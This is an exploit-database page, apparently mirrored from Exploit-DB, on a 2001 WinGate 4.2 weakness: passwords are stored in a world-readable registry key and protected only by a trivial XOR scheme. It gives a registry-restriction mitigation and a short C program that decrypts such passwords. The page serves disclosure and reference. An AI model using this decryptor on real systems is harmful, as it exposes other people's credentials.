header-logo
Suggest Exploit
vendor:
WinGate
by:
SecurityFocus
7.5
CVSS
HIGH
WinGate Password Encryption Weakness
N/A
CWE
Product Name: WinGate
Affected Version From: WinGate 4.2
Affected Version To: WinGate 4.2
Patch Exists: No
Related CWE: N/A
CPE: o:deerfield:wingate
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2001

WinGate Password Encryption Weakness

WinGate stores encrypted passwords in the registry, in a subkey where Everyone has Read access by default. The encryption scheme is weak, and therefore anyone can get and decrypt them. The exploit code provided is a C program that takes an encrypted password as an argument and decrypts it.

Mitigation:

Restrict access to the registry subkey containing the encrypted passwords.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/511/info

WinGate stores encrypted passwords in the registry, in a subkey where Everyone has Read access by default. The encryption scheme is weak, and therefore anyone can get and decrypt them.

#include "stdafx.h"
#include <stdio.h>
#include <string.h>

main(int argc, char *argv[]) {
char i;

for(i = 0; i < strlen(argv[1]); i++)
putchar(argv[1][i]^(char)((i + 1) << 1));
return 0;

}

Navigation

Suggest Exploit

Services By CQR